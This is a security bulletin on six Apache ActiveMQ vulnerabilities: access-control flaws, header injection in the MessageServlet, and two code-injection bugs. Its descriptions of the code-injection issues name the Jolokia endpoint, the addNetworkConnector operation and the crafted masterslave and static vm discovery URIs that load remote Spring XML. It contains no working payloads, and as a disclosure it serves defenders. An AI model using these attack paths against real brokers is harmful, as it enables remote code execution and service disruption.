SB2026060499 - Multiple vulnerabilities in ActiveMQ
Published: June 4, 2026
Breakdown by Severity
- Low
- Medium
- High
- Critical
Description
This security bulletin contains information about 6 vulnerabilities.
1) Improper access control (CVE-ID: CVE-2026-49157)
CWE-ID: CWE-284 - Improper Access Control
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/U:Clear
The vulnerability allows a remote user to perform broker management operations.
The vulnerability exists due to improper access control in the Jolokia authorization settings when handling web-login access to Jolokia operations. A remote user can invoke administrative broker management operations such as addQueue and removeQueue to perform broker management operations.
2) Improper access control (CVE-ID: CVE-2026-49270)
CWE-ID: CWE-284 - Improper Access Control
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/U:Green
The vulnerability allows a remote attacker to disclose sensitive information.
The vulnerability exists due to improper access control in the OpenWire BrokerInfo handling when processing a BrokerInfo command on a broker with a network connector configured with syncDurableSubs set to true. A remote attacker can send a BrokerInfo command to disclose sensitive information.
The exposed metadata includes durable topic subscription details such as client identifiers, subscription names, topic destinations, and JMS selector expressions.
3) Cross-site scripting (CVE-ID: CVE-2026-42253)
CWE-ID: CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:U/U:Green
The vulnerability allows a remote attacker to inject or overwrite HTTP response headers.
The vulnerability exists due to improper neutralization of input during web page generation in the MessageServlet in the ActiveMQ web console API when copying JMS message properties into HTTP response headers. A remote attacker can set crafted JMS message properties to inject or overwrite HTTP response headers.
The issue affects messages returned by the servlet.
4) Code Injection (CVE-ID: CVE-2026-42588)
CWE-ID: CWE-94 - Improper Control of Generation of Code ('Code Injection')
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/U:Green
The vulnerability allows a remote user to execute arbitrary code.
The vulnerability exists due to code injection in the Jolokia JMX-HTTP bridge addNetworkConnector operation when processing a crafted discovery URI through /api/jolokia/. A remote user can invoke BrokerService.addNetworkConnector(String) with a crafted discovery URI to execute arbitrary code.
The issue involves loading a Spring XML application context via the VM transport's brokerConfig parameter using a "masterslave://" URL, and user interaction is not required.
5) Code Injection (CVE-ID: CVE-2026-45505)
CWE-ID: CWE-94 - Improper Control of Generation of Code ('Code Injection')
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/U:Green
The vulnerability allows a remote user to execute arbitrary code.
The vulnerability exists due to improper input validation and code injection in the Jolokia JMX-HTTP bridge and BrokerService.addNetworkConnector(String)/addConnector(String) operations when handling crafted discovery URIs through the /api/jolokia/ web console endpoint. A remote user can invoke these operations with a specially crafted discovery URI to execute arbitrary code.
The issue involves non-parenthesized discovery wrappers such as masterslave:vm://...,... and static:vm://... that bypass prior validation, causing the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext before configuration validation completes.
6) Improper access control (CVE-ID: CVE-2026-46605)
CWE-ID: CWE-284 - Improper Access Control
CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/U:Clear
The vulnerability allows a remote user to remove existing destinations.
The vulnerability exists due to improper access control in the Apache ActiveMQ server destination removal functionality when handling authenticated destination removal requests. A remote user can send a destination removal request to remove existing destinations.
Remediation
Install update from vendor's website.
References
- https://lists.apache.org/api/email.lua?id=vjvynxydk7jfsjyft506n0lhj5o5vnr3
- https://activemq.apache.org/
- https://lists.apache.org/api/email.lua?id=1m3vk2sd8v8y9p7wys5rrt0kn53pnoo3
- https://lists.apache.org/api/email.lua?id=rh0nr6shwhgpyhg4xlrkslznc57m87xy
- https://lists.apache.org/api/email.lua?id=8dw2wyojfkxhk45sqnbbqpswcxvh7zf7
- https://lists.apache.org/api/email.lua?id=d6osvylbdvzrhw62xj6q9jxo34rdl9tw
- https://lists.apache.org/api/email.lua?id=ps84bv1t52p1mj9m0trt58l6rvzv2mtm